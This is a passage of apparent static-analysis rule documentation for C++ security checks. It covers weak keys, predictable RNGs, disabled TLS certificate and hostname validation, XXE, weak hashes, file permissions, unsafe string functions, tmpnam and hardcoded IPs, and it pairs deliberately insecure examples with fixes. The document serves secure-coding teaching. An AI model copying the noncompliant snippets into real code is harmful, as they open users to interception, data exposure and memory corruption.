    Botan::DL_Group("dsa/botan/1024"); // Noncompliant
}

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

#include <botan/ec_group.h>

void encrypt() {
    Botan::EC_Group("secp160k1"); // Noncompliant
}

Compliant solution

#include <botan/pubkey.h>
#include <botan/rng.h>
#include <botan/rsa.h>

void encrypt() {
    std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::System_RNG);
    Botan::RSA_PrivateKey                           rsaKey(*rng, 2048);
}
#include <botan/dl_group.h>

void encrypt() {
    Botan::DL_Group("dsa/botan/2048");
}
#include <botan/ec_group.h>

void encrypt() {
    Botan::EC_Group("secp224k1");
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of a key generated with an elliptic curve algorithm is indicated directly in its name. For example, secp256k1 generates a 256-bit private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterparts.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Resources

Articles & blog posts

Standards

cpp:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the functions rely on a pseudorandom number generator, they should not be used for security-critical applications or for protecting sensitive data.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. This is the case for all encryption mechanisms, or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use functions which rely on a strong random number generator such as randombytes_uniform() or randombytes_buf() from libsodium, or randomize() from Botan.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

#include <cstdlib>
// ...

void f() {
  int random_int = std::rand(); // Sensitive
}

Compliant Solution

#include <sodium.h>
#include <botan/system_rng.h>
// ...

void f() {
  char sodium_chars[10];
  randombytes_buf(sodium_chars, 10); // Compliant
  uint32_t random_int = randombytes_uniform(10); // Compliant

  uint8_t botan_chars[10];
  Botan::System_RNG system;
  system.randomize(botan_chars, 10); // Compliant
}

See

cpp:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in Botan

Code examples

The following code contains examples of disabled hostname validation.

Hostname validation is disabled by overriding tls_verify_cert_chain with an empty implementation. It is highly recommended to keep the original implementation.

Noncompliant code example

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks
{
    virtual void tls_verify_cert_chain(
              const std::vector<Botan::X509_Certificate> &cert_chain,
              const std::vector<std::shared_ptr<const Botan::OCSP::Response>> &ocsp_responses,
              const std::vector<Botan::Certificate_Store *> &trusted_roots,
              Botan::Usage_Type usage,
              const std::string &hostname,
              const Botan::TLS::Policy &policy)
    override  { }
};

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12); // Noncompliant
}

Compliant solution

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks { };

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12);
}

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Resources

Documentation

Standards

cpp:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset a password, etc.).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, or SHA-3, are recommended. For password hashing, it is even better to use deliberately slow algorithms such as bcrypt, scrypt, argon2, or PBKDF2, because they slow down brute-force attacks.

Sensitive Code Example

#include <botan/hash.h>
// ...

Botan::secure_vector<uint8_t> f(std::string input){
    std::unique_ptr<Botan::HashFunction> hash(Botan::HashFunction::create("MD5")); // Sensitive
    return hash->process(input);
}

Compliant Solution

#include <botan/hash.h>
// ...

Botan::secure_vector<uint8_t> f(std::string input){
    std::unique_ptr<Botan::HashFunction> hash(Botan::HashFunction::create("SHA-512")); // Compliant
    return hash->process(input);
}

See

cpp:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in Xerces

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

#include "xercesc/parsers/XercesDOMParser.hpp"

void parse(const char *xmlFile) {
  XercesDOMParser *DOMparser = new XercesDOMParser();
  DOMparser->setCreateEntityReferenceNodes(false); // Noncompliant
  DOMparser->setDisableDefaultEntityResolution(false); // Noncompliant

  DOMparser->parse(xmlFile);
}

By default, entities resolution is enabled for XMLReaderFactory::createXMLReader.

#include "xercesc/sax2/SAX2XMLReader.hpp"

void parse(const char *xmlFile) {
  SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();
  reader->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, false); // Noncompliant

  reader->parse(xmlFile);
}

By default, entities resolution is enabled for SAXParser.

#include "xercesc/parsers/SAXParser.hpp"

void parse(const char *xmlFile) {
  SAXParser* SAXparser = new SAXParser();
  SAXparser->setDisableDefaultEntityResolution(false); // Noncompliant

  SAXparser->parse(xmlFile);
}

Compliant solution

By default, XercesDOMParser is safe.

#include "xercesc/parsers/XercesDOMParser.hpp"

void parse(const char *xmlFile) {
  XercesDOMParser *DOMparser = new XercesDOMParser();
  DOMparser->setCreateEntityReferenceNodes(true);
  DOMparser->setDisableDefaultEntityResolution(true);

  DOMparser->parse(xmlFile);
}
#include "xercesc/sax2/SAX2XMLReader.hpp"

void parse(const char *xmlFile) {
  SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();
  reader->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);

  reader->parse(xmlFile);
}
#include "xercesc/parsers/SAXParser.hpp"

void parse(const char *xmlFile) {
  SAXParser* SAXparser = new SAXParser();
  SAXparser->setDisableDefaultEntityResolution(true);

  SAXparser->parse(xmlFile);
}

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.

Resources

Standards

cpp:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

When creating a file or directory with permissions to "other group":

open("myfile.txt", O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process sets 777 permissions on this newly created file

mkdir("myfolder", S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process try to set 777 permissions to this newly created directory

When explicitly adding permissions to "other group" with chmod, fchmod or filesystem::permissions functions:

chmod("myfile.txt", S_IRWXU | S_IRWXG | S_IRWXO);  // Sensitive: the process sets 777 permissions on this file

fchmod(fd, S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process sets 777 permissions on this file descriptor

When defining the umask without masking the read, write and execute permissions of the "others" category:

umask(S_IRWXU | S_IRWXG); // Sensitive: files and directories created afterwards may grant permissions to "others"

Compliant Solution

When creating a file or directory, do not set permissions to "other group":

open("myfile.txt", O_CREAT, S_IRWXU | S_IRWXG); // Compliant

mkdir("myfolder", S_IRWXU | S_IRWXG); // Compliant

When using chmod, fchmod or filesystem::permissions functions, do not add permissions to "other group":

chmod("myfile.txt", S_IRWXU | S_IRWXG);  // Compliant

fchmod(fd, S_IRWXU | S_IRWXG); // Compliant

When defining the umask, mask out the read, write and execute permissions of the "others" category:

umask(S_IRWXO); // Compliant: further created files or directories will not have permissions set for "other group"

See

cpp:S5814

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strcat( char *restrict dest, const char *restrict src ); appends the characters of string src at the end of dest. The wcscat function does the same for wide characters and should be used with the same guidelines.

Note: the functions strncat and wcsncat might look like attractive safe replacements for strcat and wcscat, but they have their own set of issues (see S5815), and you should probably prefer a better-suited alternative.

Ask Yourself Whether

  • There is a possibility that either the src or the dest pointer is null
  • The current string length of dest plus the current string length of src plus 1 (for the final null character) is larger than the size of the buffer pointed to by dest
  • There is a possibility that either string is not correctly null-terminated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, strcat_s and wcscat_s, which were designed as safer alternatives to strcat and wcscat. Using them in all circumstances is not recommended, because they introduce a runtime overhead and require more error-handling code, but they perform checks that limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone
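If annex K is not available, a checked append can also be built on snprintf, which never writes past the given size and always null-terminates. A minimal sketch, assuming dest already holds a null-terminated string within destsz (the helper name safe_append is illustrative, not part of any standard):

```c
#include <stdio.h>
#include <string.h>

// Append src to dest without writing past destsz bytes.
// Returns 0 on success, -1 if the result had to be truncated.
int safe_append(char *dest, size_t destsz, const char *src) {
    size_t used = strlen(dest);
    // snprintf writes at most destsz - used bytes, including the final null
    int written = snprintf(dest + used, destsz - used, "%s", src);
    return (written < 0 || (size_t)written >= destsz - used) ? -1 : 0;
}
```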

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, "Result: ");
  strcat(dest, src); // Sensitive: might overflow
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char result[] = "Result: ";
  char *dest = malloc(sizeof(result) + strlen(src)); // No need for +1 for the final null character: sizeof(result) already counts it
  strcpy(dest, result);
  strcat(dest, src); // Compliant: the buffer size was carefully crafted
  int r = doSomethingWith(dest);
  free(dest);
  return r;
}

See

cpp:S5813

The function size_t strlen(const char *s) measures the length of the string s (excluding the final null character).
The function size_t wcslen(const wchar_t *s) does the same for wide characters, and should be used with the same guidelines.

Similarly to many other functions in the standard C libraries, strlen and wcslen assume that their argument is not a null pointer.

Additionally, they expect the strings to be null-terminated. For example, the 5-letter string "abcde" must be stored in memory as "abcde\0" (i.e. using 6 characters) to be processed correctly. When a string is missing the null character at the end, these functions will iterate past the end of the buffer, which is undefined behavior.

Therefore, string parameters must end with a proper null character. The absence of this particular character can lead to security vulnerabilities that allow, for example, access to sensitive data or the execution of arbitrary code.

Ask Yourself Whether

  • There is a possibility that the pointer is null.
  • There is a possibility that the string is not correctly null-terminated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use safer functions. The C11 functions strnlen_s and wcsnlen_s from annex K handle typical programming errors.
    Note, however, that they have a runtime overhead and require more error-handling code, and are therefore not suited to every case.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions.
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone.
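When a string might be missing its terminator, the length computation itself can be bounded so it never scans past the buffer. POSIX offers strnlen for exactly this; a portable sketch of the same idea (the name bounded_strlen is illustrative):

```c
#include <stddef.h>

// Return the length of s, but never examine more than maxlen bytes.
// Mirrors POSIX strnlen: returns maxlen when no null byte is found.
size_t bounded_strlen(const char *s, size_t maxlen) {
    size_t i = 0;
    while (i < maxlen && s[i] != '\0') {
        ++i;
    }
    return i;
}
```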

Sensitive Code Example

size_t f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof dest); // Truncation may happen
  return strlen(dest); // Sensitive: "dest" will not be null-terminated if truncation happened
}

Compliant Solution

size_t f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof dest); // Truncation may happen
  dest[sizeof dest - 1] = 0;
  return strlen(dest); // Compliant: "dest" is guaranteed to be null-terminated
}

See

  • MITRE, CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
  • CERT, STR07-C. - Use the bounds-checking interfaces for string manipulation
cpp:S5816

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strncpy(char * restrict dest, const char * restrict src, size_t count); copies the first count characters from src to dest, stopping at the first null character, and filling extra space with 0. The wcsncpy function does the same for wide characters and should be used with the same guidelines.

Both of those functions are designed to work with fixed-length strings and might result in a non-null-terminated string.

Ask Yourself Whether

  • There is a possibility that either the source or the destination pointer is null
  • The security of your system can be compromised if the destination is a truncated version of the source
  • The source buffer can be both non-null-terminated and smaller than the count
  • The destination buffer can be smaller than the count
  • You expect dest to be a null-terminated string
  • There is an overlap between the source and the destination

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, strncpy_s and wcsncpy_s, which were designed as safer alternatives to strncpy and wcsncpy. Using them in all circumstances is not recommended, because they introduce a runtime overhead and require more error-handling code, but they perform checks that limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are using strncpy and wcsncpy as safer versions of strcpy and wcscpy, you should instead consider strcpy_s and wcscpy_s, because these functions have several shortcomings:
    • It’s not easy to detect truncation
    • Too much work is done to fill the buffer with 0, leading to suboptimal performance
    • Unless manually corrected, the dest string might not be null-terminated
  • If you want to use the strncpy and wcsncpy functions and detect whether the string was truncated, the pattern is the following:
    • Set the last character of the buffer to null
    • Call the function
    • Check if the last character of the buffer is still null
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof(dest)); // Sensitive: might silently truncate
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char dest[256];
  dest[sizeof dest - 1] = 0;
  strncpy(dest, src, sizeof(dest)); // Compliant
  if (dest[sizeof dest - 1] != 0) {
    // Handle error
  }
  return doSomethingWith(dest);
}

See

cpp:S5815

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strncat( char *restrict dest, const char *restrict src, size_t count ); appends the characters of string src at the end of dest, but appends at most count characters; dest will always be null-terminated. The wcsncat function does the same for wide characters, and should be used with the same guidelines.

Ask Yourself Whether

  • There is a possibility that either the src or the dest pointer is null
  • The current string length of dest plus the current string length of src plus 1 (for the final null character) is larger than the size of the buffer pointed to by dest
  • There is a possibility that either string is not correctly null-terminated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, strncat_s and wcsncat_s, which were designed as safer alternatives to strncat and wcsncat. Using them in all circumstances is not recommended because they introduce a runtime overhead and require more error-handling code, but they perform checks that limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are using strncat and wcsncat as safer versions of strcat and wcscat, you should instead consider strcat_s and wcscat_s because these functions have several shortcomings:
    • It’s not easy to detect truncation
    • The count parameter is error-prone
    • Computing the count parameter typically requires computing the string length of dest, at which point other simpler alternatives exist
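To illustrate the last point: the count strncat expects is the space remaining in dest, not the buffer size, and computing it requires a strlen(dest) call first. A minimal sketch (append_bounded is an illustrative name):

```c
#include <string.h>

// Append src to dest, giving strncat the space actually left in dest.
// The -1 reserves room for the null terminator strncat always appends.
void append_bounded(char *dest, size_t destsz, const char *src) {
    size_t used = strlen(dest);
    if (used + 1 < destsz) {
        strncat(dest, src, destsz - used - 1);
    }
}
```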

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, "Result: ");
  strncat(dest, src, sizeof dest); // Sensitive: passing the buffer size instead of the remaining size
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char result[] = "Result: ";
  char dest[256];
  strcpy(dest, result);
  strncat(dest, src, sizeof dest - sizeof result); // Compliant but may silently truncate
  return doSomethingWith(dest);
}

See

cpp:S5824

The functions "tmpnam", "tmpnam_s" and "tmpnam_r" are all used to return a file name that does not match an existing file, in order for the application to create a temporary file. However, even if the file did not exist at the time those functions were called, it might exist by the time the application tries to use the name to create the file. This has been used by hackers to gain access to files that the application believed were trustworthy.

There are alternative functions that, in addition to creating a suitable file name, create and open the file and return the file handler. Such functions are protected from this attack vector and should be preferred. About the only reason to use these functions would be to create a temporary folder, not a temporary file.

Additionally, these functions might not be thread-safe, and if you don’t provide them buffers of sufficient size, you will have a buffer overflow.

Ask Yourself Whether

  • There is a possibility that several threads call any of these functions simultaneously
  • There is a possibility that the resulting file is opened without forcing its creation, meaning that it might have unexpected access rights
  • The buffers passed to these functions are respectively smaller than
    • L_tmpnam for tmpnam
    • L_tmpnam_s for tmpnam_s
    • L_tmpnam for tmpnam_r

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a function that directly opens the temporary file, such as tmpfile, tmpfile_s, mkstemp or mkstemps (the last two allow more accurate control of the file name).
  • If you can’t get rid of these functions, when using the generated name to open the file, use a function that forces the creation of the file and fails if the file already exists.

Sensitive Code Example

void f(char *tempData) {
  char *path = tmpnam(NULL); // Sensitive
  FILE* f = fopen(path, "w");
  fputs(tempData, f);
  fclose(f);
}

Compliant Solution

void f(char *tempData) {
  // The file will be opened in "wb+" mode, and will be automatically removed on normal program exit
  FILE* f = tmpfile(); // Compliant
  fputs(tempData, f);
  fclose(f);
}

See

cpp:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It can mislead developers into using the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but when the IP address is hardcoded, fixing the issue takes longer, which increases the attack's impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows changing the destination quickly without having to rebuild the software.
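A host-resolution helper like the getDatabaseHost used in the compliant example can be as simple as reading an environment variable with a domain-name fallback. A sketch (the DB_HOST variable name and the fallback host are illustrative):

```c
#include <stdlib.h>
#include <string.h>

// Resolve the database host from the environment instead of hardcoding
// an IP address. DB_HOST and the fallback domain name are illustrative.
const char *getDatabaseHost(void) {
    const char *host = getenv("DB_HOST");
    return (host != NULL) ? host : "db.internal.example.com";
}
```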

Sensitive Code Example

dbi_conn conn = dbi_conn_new("mysql");
string host = "10.10.0.1"; // Sensitive
dbi_conn_set_option(conn, "host", host.c_str());
dbi_conn_set_option(conn, "host", "10.10.0.1"); // Sensitive

Compliant Solution

dbi_conn conn = dbi_conn_new("mysql");
string host = getDatabaseHost(); // Compliant
dbi_conn_set_option(conn, "host", host.c_str()); // Compliant

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

cpp:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Botan

Code examples

The following code contains examples of disabled certificate validation.

The certificate validation gets disabled by overriding tls_verify_cert_chain with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks
{
    virtual void tls_verify_cert_chain(
              const std::vector<Botan::X509_Certificate> &cert_chain,
              const std::vector<std::shared_ptr<const Botan::OCSP::Response>> &ocsp_responses,
              const std::vector<Botan::Certificate_Store *> &trusted_roots,
              Botan::Usage_Type usage,
              const std::string &hostname,
              const Botan::TLS::Policy &policy)
    override  { }
};

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12); // Noncompliant
}

Compliant solution

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks { };

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12);
}

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Documentation

Standards

cpp:S5801

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strcpy(char * restrict dest, const char * restrict src); copies characters from src to dest. The wcscpy function does the same for wide characters and should be used with the same guidelines.

Note: the functions strncpy and wcsncpy might look like attractive safe replacements for strcpy and wcscpy, but they have their own set of issues (see S5816), and you should probably prefer another more adapted alternative.

Ask Yourself Whether

  • There is a possibility that either the source or the destination pointer is null
  • There is a possibility that the source string is not correctly null-terminated, or that its length (including the final null character) can be larger than the size of the destination buffer.
  • There is an overlap between source and destination

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, strcpy_s and wcscpy_s, which were designed as safer alternatives to strcpy and wcscpy. Using them in all circumstances is not recommended, because they introduce a runtime overhead and require more error-handling code, but they perform checks that limit the consequences of calling the function with bad arguments.
